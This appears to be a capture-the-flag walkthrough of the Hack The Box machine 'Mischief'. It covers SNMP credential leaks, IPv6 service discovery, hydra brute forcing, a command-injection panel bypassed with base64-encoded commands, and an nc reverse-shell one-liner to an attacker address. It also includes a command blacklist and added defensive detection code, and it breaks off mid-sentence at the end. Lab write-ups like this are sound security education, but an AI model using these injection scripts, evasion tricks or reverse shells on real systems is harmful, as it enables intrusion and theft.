Writeup: Hack The Box - Machines - Mischief

Description

  • Name: Mischief
  • IP: 10.10.10.92
  • Author: trickster0
  • Difficulty: 6.4/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 --min-rate 1000 --max-retries 5 10.10.10.92

PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
| 256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_ 256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
3366/tcp open caldav Radicale calendar and contacts server (Python BaseHTTPServer)
| http-auth:
| HTTP/1.0 401 Unauthorized\x0D
|_ Basic realm=Test
|_http-server-header: SimpleHTTP/0.6 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

nmap -sV -sC -sU --top-ports 1000 10.10.10.92

PORT    STATE SERVICE REASON
161/udp open snmp udp-response ttl 63

For the SNMP port we ran a more detailed scan:

nmap -sU -p 161 --script default,snmp-info 10.10.10.92

PORT    STATE SERVICE
161/udp open snmp
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: b6a9f84e18fef95a00000000
| snmpEngineBoots: 19
|_ snmpEngineTime: 24m25s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 0.00 Kb sent, 0.00 Kb received
| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
| IP address: 10.10.10.92 Netmask: 255.255.255.0
| MAC address: 00:50:56:b9:73:1a (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
|_ Traffic stats: 2.36 Mb sent, 17.58 Mb received
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:3366 0.0.0.0:0
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:48675 *:*
|_ UDP 127.0.0.53:53 *:*
| snmp-processes:
| 1:
| Name: systemd
| Path: /sbin/init
| Params: maybe-ubiquity
| 2:
| Name: kthreadd
| 3:
| Name: kworker/0:0
| 4:
| Name: kworker/0:0H
| 5:
| Name: kworker/u2:0
| 6:
| Name: mm_percpu_wq
| 7:
| Name: ksoftirqd/0
| 8:
| Name: rcu_sched
| 9:
| Name: rcu_bh
| 10:
| Name: migration/0
| 11:
| Name: watchdog/0
| 12:
| Name: cpuhp/0
| 13:
| Name: kdevtmpfs
| 14:
| Name: netns
| 15:
| Name: rcu_tasks_kthre
| 16:
| Name: kauditd
| 17:
| Name: khungtaskd
| 18:
| Name: oom_reaper
| 19:
| Name: writeback
| 20:
| Name: kcompactd0
| 21:
| Name: ksmd
| 22:
| Name: khugepaged
| 23:
| Name: crypto
| 24:
| Name: kintegrityd
| 25:
| Name: kblockd
| 26:
| Name: ata_sff
| 27:
| Name: md
| 28:
| Name: edac-poller
| 29:
| Name: devfreq_wq
| 30:
| Name: watchdogd
| 34:
| Name: kswapd0
| 35:
| Name: ecryptfs-kthrea
| 77:
| Name: kthrotld
| 78:
| Name: acpi_thermal_pm
| 79:
| Name: scsi_eh_0
| 80:
| Name: scsi_tmf_0
| 81:
| Name: scsi_eh_1
| 82:
| Name: scsi_tmf_1
| 85:
| Name: kworker/0:2
| 89:
| Name: ipv6_addrconf
| 98:
| Name: kstrp
| 115:
| Name: charger_manager
| 164:
| Name: mpt_poll_0
| 165:
| Name: mpt/0
| 166:
| Name: kworker/0:1H
| 204:
| Name: scsi_eh_2
| 205:
| Name: scsi_tmf_2
| 206:
| Name: ttm_swap
| 208:
| Name: irq/16-vmwgfx
| 272:
| Name: raid5wq
| 323:
| Name: jbd2/sda2-8
| 324:
| Name: ext4-rsv-conver
| 372:
| Name: vmtoolsd
| Path: /usr/bin/vmtoolsd
| 373:
| Name: systemd-journal
| Path: /lib/systemd/systemd-journald
| 376:
| Name: iscsi_eh
| 390:
| Name: lvmetad
| Path: /sbin/lvmetad
| Params: -f
| 391:
| Name: systemd-udevd
| Path: /lib/systemd/systemd-udevd
| 394:
| Name: ib-comp-wq
| 396:
| Name: ib_mcast
| 397:
| Name: ib_nl_sa_wq
| 401:
| Name: rdma_cm
| 502:
| Name: systemd-network
| Path: /lib/systemd/systemd-networkd
| 509:
| Name: systemd-timesyn
| Path: /lib/systemd/systemd-timesyncd
| 515:
| Name: systemd-resolve
| Path: /lib/systemd/systemd-resolved
| 539:
| Name: systemd-logind
| Path: /lib/systemd/systemd-logind
| 540:
| Name: networkd-dispat
| Path: /usr/bin/python3
| Params: /usr/bin/networkd-dispatcher
| 541:
| Name: lxcfs
| Path: /usr/bin/lxcfs
| Params: /var/lib/lxcfs/
| 544:
| Name: atd
| Path: /usr/sbin/atd
| Params: -f
| 547:
| Name: VGAuthService
| Path: /usr/bin/VGAuthService
| 548:
| Name: accounts-daemon
| Path: /usr/lib/accountsservice/accounts-daemon
| 549:
| Name: cron
| Path: /usr/sbin/cron
| Params: -f
| 550:
| Name: dbus-daemon
| Path: /usr/bin/dbus-daemon
| Params: --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
| 553:
| Name: cron
| Path: /usr/sbin/CRON
| Params: -f
| 559:
| Name: rsyslogd
| Path: /usr/sbin/rsyslogd
| Params: -n
| 560:
| Name: snmpd
| Path: /usr/sbin/snmpd
| Params: -Lsd -Lf /dev/null -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f
| 573:
| Name: sh
| Path: /bin/sh
| Params: -c /home/loki/hosted/webstart.sh
| 574:
| Name: polkitd
| Path: /usr/lib/policykit-1/polkitd
| Params: --no-debug
| 575:
| Name: sh
| Path: /bin/sh
| Params: /home/loki/hosted/webstart.sh
| 589:
| Name: python
| Path: python
| Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/
| 652:
| Name: sshd
| Path: /usr/sbin/sshd
| Params: -D
| 663:
| Name: iscsid
| Path: /sbin/iscsid
| 664:
| Name: iscsid
| Path: /sbin/iscsid
| 723:
| Name: mysqld
| Path: /usr/sbin/mysqld
| Params: --daemonize --pid-file=/run/mysqld/mysqld.pid
| 727:
| Name: agetty
| Path: /sbin/agetty
| Params: -o -p -- \u --noclear tty1 linux
| 777:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
| 779:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
| 780:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
| 781:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
| 782:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
| 783:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
| 1051:
| Name: kworker/u2:1
| 1070:
|_ Name: kworker/u2:2
| snmp-sysdescr: Linux Mischief 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
|_ System uptime: 24m26.08s (146608 timeticks)
| snmp-win32-software:
| accountsservice-0.6.45-1ubuntu1; 0-01-01T00:00:00
| acl-2.2.52-3build1; 0-01-01T00:00:00
| [...]
| xxd-2:8.0.1453-1ubuntu1; 0-01-01T00:00:00
| xz-utils-5.2.2-1.3; 0-01-01T00:00:00
| zerofree-1.0.4-1; 0-01-01T00:00:00
|_ zlib1g-1:1.2.11.dfsg-0ubuntu2; 0-01-01T00:00:00

Pwn

Accessing port 3366 via the browser we are asked to enter HTTP credentials.
From the SNMP scan we found that PID 589 is associated with a Python program:

| Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/

The process simply spawns an HTTP server on port 3366 with user loki and password godofmischiefisloki, and the full command line (credentials included) is readable by anyone who can query SNMP.

Simple Network Management Protocol (SNMP) is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. Devices that typically support SNMP include cable modems, routers, switches, servers, workstations, printers, and more.

SNMP is widely used in network management for network monitoring. SNMP exposes management data in the form of variables on the managed systems organized in a management information base (MIB) which describe the system status and configuration. These variables can then be remotely queried (and, in some circumstances, manipulated) by managing applications.
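The credential leak above comes from the HOST-RESOURCES-MIB process table (hrSWRunParameters), which exposes every process's argument vector to any reader of the community string. As an added example that is not part of the original writeup, the Python below parses nmap's snmp-processes output and flags processes whose arguments look like credentials, which is the check a defender would run against their own scan output (or against `ps -eo pid,comm,args` locally). The sample block is constructed from a few lines of the scan above; the regex heuristics and function names are this example's own assumptions, not an exhaustive secret detector.

```python
import re

# Constructed sample: a fragment of nmap's snmp-processes output in the same
# layout as the scan above (pids and command lines taken from it).
SAMPLE_SNMP_PROCESSES = """\
| 550:
|   Name: dbus-daemon
|   Path: /usr/bin/dbus-daemon
|   Params: --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
| 560:
|   Name: snmpd
|   Path: /usr/sbin/snmpd
|   Params: -Lsd -Lf /dev/null -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f
| 589:
|   Name: python
|   Path: python
|   Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/
| 723:
|   Name: mysqld
|   Path: /usr/sbin/mysqld
|   Params: --daemonize --pid-file=/run/mysqld/mysqld.pid
"""

# Heuristic patterns (assumptions for this example, not an exhaustive list):
# a bare user:password token and explicit password/secret flags.
SECRET_PATTERNS = [
    ("user:password pair", re.compile(r"(?<![\w/.:])[A-Za-z][\w.-]*:[^\s:/@]{6,}")),
    ("password flag", re.compile(r"(?i)--?(?:password|passwd|pass|secret|token)[=\s]")),
]


def parse_snmp_processes(text):
    """Turn the '| <pid>:' / 'Name:' / 'Path:' / 'Params:' blocks into dicts."""
    procs, cur = [], None
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").strip()
        m = re.match(r"^(\d+):$", line)
        if m:
            cur = {"pid": int(m.group(1)), "name": "", "path": "", "params": ""}
            procs.append(cur)
        elif cur is not None and ":" in line:
            key, _, value = line.partition(":")
            key = key.strip().lower()
            if key in ("name", "path", "params"):
                cur[key] = value.strip()
    return procs


def find_exposed_secrets(text):
    """Return (pid, name, reason) for each process whose argv looks like it
    carries a credential. Anything visible here is visible to every host
    that knows the read-only community string."""
    hits = []
    for p in parse_snmp_processes(text):
        for reason, pat in SECRET_PATTERNS:
            if pat.search(p["params"]):
                hits.append((p["pid"], p["name"], reason))
                break
    return hits


if __name__ == "__main__":
    import sys
    # Usage: python3 snmp_argv_secrets.py < nmap-snmp-output.txt
    for pid, name, reason in find_exposed_secrets(sys.stdin.read()):
        print(f"pid {pid} ({name}): {reason} in command line")
```

On the sample input only PID 589 is reported; the dbus `--address=systemd:` and the snmpd `-u Debian-snmp` arguments are correctly ignored. The fix on the server side is the same whatever the tool: pass secrets through a config file or the environment rather than argv, and restrict SNMP to a management network.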

Using those credentials we can log in on port 3366.
On the main page we found another pair of credentials:

loki godofmischiefisloki
loki trickeryanddeceit

From snmp-netstat we saw that there are other ports open, bound to *:*:

| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:3366 0.0.0.0:0
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:48675 *:*
|_ UDP 127.0.0.53:53 *:*

so we used snmpwalk to extend our analysis of the service.

snmpwalk -v 2c -c public 10.10.10.92 (very long output and scan)

We also found the IPv6 addresses of the machine:

dead:beef:0000:0000:0250:56ff:feb9:731a
fe80:0000:0000:0000:0250:56ff:feb9:731a

and with an nmap scan over IPv6 we found an Apache server on port 80 that is not reachable over IPv4.

nmap -p 1-65535 -Pn -sV -T4 -6 dead:beef:0000:0000:0250:56ff:feb9:731a

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
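The snmp-netstat table above only lists IPv4 sockets, so the Apache listener bound to the IPv6 wildcard never appeared in it, and an IPv4-only port scan would not have found it either. As an added example (not part of the original writeup), the Python below parses `ss -tuln` output and reports ports that listen on an IPv6 wildcard with no IPv4 listener at all, which is exactly the blind spot this box relied on. The ss output is constructed for the example to mirror this host's layout; the function names are assumptions of the example.

```python
# Constructed sample of `ss -tuln` on a host laid out like Mischief: Apache
# (port 80) answers only on the IPv6 wildcard, so neither an IPv4 scan nor
# SNMP's IPv4-only tcpConnTable lists it.
SAMPLE_SS_OUTPUT = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp   LISTEN 0      128    0.0.0.0:22        0.0.0.0:*
tcp   LISTEN 0      128    [::]:22           [::]:*
tcp   LISTEN 0      128    0.0.0.0:3366      0.0.0.0:*
tcp   LISTEN 0      80     127.0.0.1:3306    0.0.0.0:*
tcp   LISTEN 0      128    [::]:80           [::]:*
udp   UNCONN 0      0      0.0.0.0:161       0.0.0.0:*
udp   UNCONN 0      0      127.0.0.53:53     0.0.0.0:*
"""

# Addresses that mean "every interface" for the respective family.
WILDCARDS = {"0.0.0.0", "::", "*"}


def parse_listeners(text):
    """Return (proto, family, address, port) for each socket line of ss -tuln."""
    out = []
    for line in text.splitlines()[1:]:  # skip the header line
        fields = line.split()
        if len(fields) < 5:
            continue
        proto, local = fields[0], fields[4]
        addr, _, port = local.rpartition(":")  # rpartition copes with [::]:80
        family = "ipv6" if addr.startswith("[") else "ipv4"
        out.append((proto, family, addr.strip("[]"), int(port)))
    return out


def ipv6_only_listeners(text):
    """Ports that listen on an IPv6 wildcard but have no IPv4 listener.
    These are the services an IPv4-only inventory or scan will miss."""
    by_port = {}
    for proto, family, addr, port in parse_listeners(text):
        by_port.setdefault((proto, port), set()).add((family, addr))
    result = []
    for (proto, port), socks in sorted(by_port.items()):
        v6_wild = any(f == "ipv6" and a in WILDCARDS for f, a in socks)
        has_v4 = any(f == "ipv4" for f, a in socks)
        if v6_wild and not has_v4:
            result.append((proto, port))
    return result


if __name__ == "__main__":
    import sys
    # Usage: ss -tuln | python3 ipv6_only.py
    for proto, port in ipv6_only_listeners(sys.stdin.read()):
        print(f"{proto}/{port} is reachable over IPv6 only")
```

On the sample, only tcp/80 is reported: port 22 has listeners in both families and the rest are IPv4. Whatever you scan or monitor, do it for both address families, or the dual-stack host will have a surface you never inventoried.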

The page asks for a login and no known vulnerabilities were found in the form, so we started hydra with usernames from namelist.txt (from Metasploit) and these passwords:

godofmischiefisloki
trickeryanddeceit

The program returned a pair of credentials:

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-09-21 17:33:47
[DATA] max 64 tasks per 1 server, overall 64 tasks, 22908 login tries (l:1909/p:12), ~358 tries per task
[DATA] attacking http-post-form://mischief.htb:80//login.php:user=^USER^&password=^PASS^:Sorry, those credentials do not match
[80][http-post-form] host: mischief.htb login: administrator password: trickeryanddeceit

The web form executes every command entered, but some commands are blacklisted; among the ones we can use are:

  • cat
  • echo
  • ping
  • tar
  • sh
  • source
  • sleep
  • id
  • whoami
  • python

but the main problem is that we don’t have any output.

After many tries we found that we get the output of a command only if we append a second command after it:

curl -X POST http://mischief.htb/ --data "command=<cmd1>;<cmd2>" prints the output of <cmd1>

N.B.: mischief.htb is simply an /etc/hosts entry for the IPv6 address.

curl -X POST http://mischief.htb/ -H "Cookie: PHPSESSID=0shjckk27ntheutfa7gpko3763" --data "command=cat /etc/passwd;id"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
loki:x:1000:1004:loki:/home/loki:/bin/bash
Debian-snmp:x:111:113::/var/lib/snmp:/bin/false
mysql:x:112:115:MySQL Server,,,:/nonexistent:/bin/false

We wrote a simple script to interact with the machine:

import requests
from sys import argv

# An IPv6 literal must be bracketed in a URL; mischief.htb resolves to the
# same address, so the name is used below.
# url = "http://[dead:beef:0000:0000:0250:56ff:feb9:731a]/"
url = "http://mischief.htb/"

# Append a second command so the first one's output is not swallowed.
command = " ".join(argv[1:])
command += ";id"
r = requests.post(url, data={"command": command})

# The command output is printed after the page's closing tag.
print(r.text.split("</html>")[1].strip())

We first exfiltrated the MySQL credentials:

$server = 'localhost';
$username = 'debian-sys-maint';
$password = 'nE1S9Aw1L0Ky3Y9h';
$database = 'dbpanel';

Since we can't use ls we need a way around the shell constraints.

Searching for escaping techniques we found that we can base64-encode a command and then issue echo -n "<aBase64String>"|base64 -d|sh to actually run the command on the remote machine.

import requests
from base64 import b64encode
from sys import argv

# An IPv6 literal must be bracketed in a URL; mischief.htb resolves to the
# same address, so the name is used below.
# url = "http://[dead:beef:0000:0000:0250:56ff:feb9:731a]/"
url = "http://mischief.htb/"

# Base64-encode the real command so none of the blacklisted substrings
# appear in the request; the decoder pipeline runs it on the target.
command = " ".join(argv[1:])
encoded = b64encode(command.encode()).decode()
command = "echo -n " + encoded + "|base64 -d|sh"
# Append a second command so the first one's output is not swallowed.
command += ";id"
r = requests.post(url, data={"command": command})

# The command output is printed after the page's closing tag.
print(r.text.split("</html>")[1].strip())

Now we can run all shell commands!

In /home/loki we found a credentials file (user.txt is not readable by www-data):

python cmd_loki.py "cat /home/loki/credentials"
pass: lokiisthebestnorsegod
Command was executed succesfully!

We can now log in with SSH as loki and get the user flag.

Running LinEnum did not show anything exploitable, and no known exploit exists for kernel version 4.15.0-20, so we focused on known services that could hide credentials or other information.

From MySQL:

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dbpanel |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.00 sec)

mysql> use dbpanel;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-------------------+
| Tables_in_dbpanel |
+-------------------+
| users |
+-------------------+
1 row in set (0.00 sec)

mysql> select * from users;
+----+---------------+--------------------------------------------------------------+
| id | user | password |
+----+---------------+--------------------------------------------------------------+
| 2 | administrator | $2y$10$0OeEYPgdvzU1XTLsKUkaIuyN3PTBQSC4oALTICEZOllPJKq1uUAkq |
+----+---------------+--------------------------------------------------------------+
1 row in set (0.00 sec)

# trickeryanddeceit

and from .mysql_history:

_HiStOrY_V2_
yse\040mysql;
use\040mysql;
SELECT\040User,\040Host,\040plugin\040FROM\040mysql.user;
FLUSH\040PRIVILEGES;
exit

From /var/www/html/index.php we have the list of blacklisted commands and can see why we need to supply two commands to see the output: the > /dev/null 2>&1 redirection is appended to the user string, so it binds only to the last command after the ; and the first command's output reaches the page.

if(isset($_POST['command'])) {
    $cmd = $_POST['command'];
    if (strpos($cmd, "nc" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "bash" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "chown" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "setfacl" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "chmod" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "perl" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "find" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "locate" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "ls" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "php" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "wget" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "curl" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "dir" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "ftp" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "telnet" ) !== false){
        echo "Command is not allowed.";
    } else {
        system("$cmd > /dev/null 2>&1");
        echo "Command was executed succesfully!";
    }
}
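The PHP above is a substring blacklist in front of system(), and the writeup already shows why that fails: the check never sees the decoded command. As an added example that is not part of the original writeup, the Python below puts a faithful mirror of that strpos() chain next to the shape a hardened handler should take: an allowlist of exact program names, argument limits, and execution without a shell. The allowed programs and argument rules are a hypothetical policy chosen for the example.

```python
import shlex
import subprocess

# The fifteen substrings index.php rejects, copied from the PHP above.
PHP_BLACKLIST = ["nc", "bash", "chown", "setfacl", "chmod", "perl", "find",
                 "locate", "ls", "php", "wget", "curl", "dir", "ftp", "telnet"]


def php_blacklist_allows(cmd):
    """Mirror of the PHP strpos() chain: True when no listed substring occurs.
    It is wrong in both directions: 'echo false' is rejected because of the
    'ls' inside 'false', while anything not spelled with those letters passes."""
    return not any(word in cmd for word in PHP_BLACKLIST)


# Hardened replacement (hypothetical policy for this example): exact program
# names mapped to the maximum number of arguments each may take.
ALLOWED = {
    "id": 0,
    "whoami": 0,
    "uptime": 0,
    "uname": 1,
}


def safe_argv(cmd):
    """Return the argv list to run, or None if the request is not allowed.
    shlex.split() never produces operator tokens, so ';', '|', '&&' and
    redirections end up inside ordinary words that fail the checks below."""
    try:
        argv = shlex.split(cmd)
    except ValueError:          # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    if len(argv) - 1 > ALLOWED[argv[0]]:
        return None
    # Arguments may only be simple words such as flags or hostnames.
    if any(not a.replace(".", "").replace("-", "").isalnum() for a in argv[1:]):
        return None
    return argv


def run_allowlisted(cmd, timeout=5):
    """Execute an allowlisted request with no shell; returns stdout or None."""
    argv = safe_argv(cmd)
    if argv is None:
        return None
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return proc.stdout


if __name__ == "__main__":
    for request in ["id", "uname -a", "id; whoami", "cat /etc/passwd"]:
        print(repr(request), "->", safe_argv(request))
```

Two points the comparison makes concrete: the original redirect trick works because `$cmd > /dev/null` is still one shell string, and with `subprocess.run(argv)` there is no shell to interpret `;` at all; and because the blacklist is a raw substring test, even the base64 wrapper on this page can be rejected by chance whenever the encoded blob happens to contain `nc`, `ls` or `dir`.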

From loki's bash history we found that he executed sudo su, su and sudo -l, but now those commands return -bash: /usr/bin/sudo: Permission denied.

python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery
exit
free -mt
ifconfig
cd /etc/
sudo su
su
exit
su root
ls -la
sudo -l
ifconfig
id
cat .bash_history
nano .bash_history
exit

Since we know that sudo is involved, we returned to www-data and spawned a reverse shell (over IPv6) using our RCE:

python cmd_loki.py "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc dead:beef:X::XXXX 4444 >/tmp/f"

From www-data we can use su and brute-force the passwords we found, and now we get root!!! (NO SENSE AT ALL :D :D :D)

After a hint we found (with find) the real flag: